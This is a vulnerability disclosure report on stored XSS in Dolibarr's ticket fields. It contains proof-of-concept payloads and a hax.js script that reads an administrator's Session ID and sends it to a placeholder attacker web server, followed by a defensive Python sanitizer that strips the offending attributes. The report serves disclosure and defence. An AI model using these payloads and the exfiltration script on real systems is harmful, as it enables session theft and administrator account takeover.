Stored XSS in dolibarr/dolibarr
Reported on Feb 6th 2023
Description
A stored Cross-Site Scripting (XSS) vulnerability exists in Dolibarr before 16.0.4 via the ticket creation flow: fields that accept HTML input keep inline event-handler attributes such as `onbeforeinput` on a `contenteditable` element. Exploitation requires that an admin edit the contents of that injected element, which fires its `onbeforeinput` handler. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator, so the injected script can extract the Session ID, which can lead to full account takeover.
Proof of Concept
- I used the payload `<font onbeforeinput="alert('XXX')" contenteditable>test</font>` on fields that accept HTML textarea input (`restricthtml` and `restricthtmlallowunvalid`).
- In the worst case, to obtain the Session ID, the payload becomes `<font onbeforeinput="let pwned = document.createElement('script'); pwned.setAttribute('src', '{ATTACKER-WEBSERVER}/hax.js'); document.body.appendChild(pwned);" contenteditable>test</font>`, and the content of `hax.js` hosted by the attacker is:

```javascript
var te = /[0-9a-zA-Z]+/gm;
var re;
var x = new XMLHttpRequest();
x.onload = function () {
  re = this.responseText;
  // the system information page prints a "Session ID" line in its HTML
  var reg = /Session\sID\S+\s\S+/gm;
  console.log(((re.match(reg))[0].match(te))[6]);
  var sessionId = ((re.match(reg))[0].match(te))[6];
  var url = "{ATTACKER-WEBSERVER}/?sess=" + sessionId;
  $.ajax(url); // jQuery is already loaded by the Dolibarr page
};
x.open('GET', '{VICTIM-WEBSERVER}/admin/system/dolibarr.php', true);
x.withCredentials = true;
x.send(null);
```
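The root cause above is an HTML field that lets an `on*` handler attribute and `contenteditable` survive into stored content. As an added defender-side example (not Dolibarr's own code and not the fix the project shipped), the Python sanitizer below shows the control that closes this class of bug: rebuild the markup from an allowlist of tags and attributes, drop every inline event handler and `contenteditable`, reject non-http `href` values, and report what was removed so already-stored ticket bodies can be audited. The allowlist, the `AllowlistSanitizer` class and the `sanitize` helper are assumptions made for this example; the inputs it is run on are the report's own payloads plus constructed variants.

```python
"""Allowlist HTML sanitizer (added example, not Dolibarr code).

Strips inline event-handler attributes such as onbeforeinput, the
contenteditable attribute and javascript: URLs from rich-text input,
and records what it removed so stored content can be audited.
"""
from html import escape
from html.parser import HTMLParser

# Hypothetical allowlist chosen for this example; a deployment tunes it.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "span", "div",
                "ul", "ol", "li", "font", "a"}
ALLOWED_ATTRS = {
    "font": {"color", "size", "face"},
    "a": {"href", "title"},
    "span": {"class"},
    "div": {"class"},
}
# href values must start with one of these (relative paths included).
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "/")


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document keeping only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []    # sanitized output fragments
        self.dropped = []  # (tag, attribute-or-None) pairs that were removed

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = value or ""
            # Every on* attribute is an inline event handler: never allowed.
            # contenteditable is what lets the victim's edit fire the handler.
            if name.startswith("on") or name == "contenteditable":
                self.dropped.append((tag, name))
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append((tag, name))
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                self.dropped.append((tag, name))  # e.g. javascript: URLs
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"<{tag}{self._clean_attrs(tag, attrs)}>")
        else:
            self.dropped.append((tag, None))  # tag removed, its text is kept

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag != "br":
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped, so a stripped <script> leaves only inert text.
        self.parts.append(escape(data, quote=False))


def sanitize(html):
    """Return (clean_html, dropped) for an untrusted rich-text field."""
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.parts), parser.dropped


# Constructed samples: the report's two payloads and two variants.
SAMPLES = [
    '<font onbeforeinput="alert(\'XXX\')" contenteditable>test</font>',
    '<font onbeforeinput="let pwned = document.createElement(\'script\');" '
    'contenteditable>test</font>',
    '<a href="javascript:alert(1)">link</a>',
    '<font color="red">ok</font><script>alert(1)</script>',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        clean, dropped = sanitize(sample)
        print(f"{sample!r}\n  -> {clean!r}\n  dropped: {dropped}")
```

Running the module prints each sample beside its sanitized form; both report payloads collapse to `<font>test</font>` with `onbeforeinput` and `contenteditable` listed as dropped, and the `dropped` list doubles as an audit signal when the function is run over content already in the database.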
Impact
In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator, so the injected script can extract the Session ID, which can lead to full account takeover.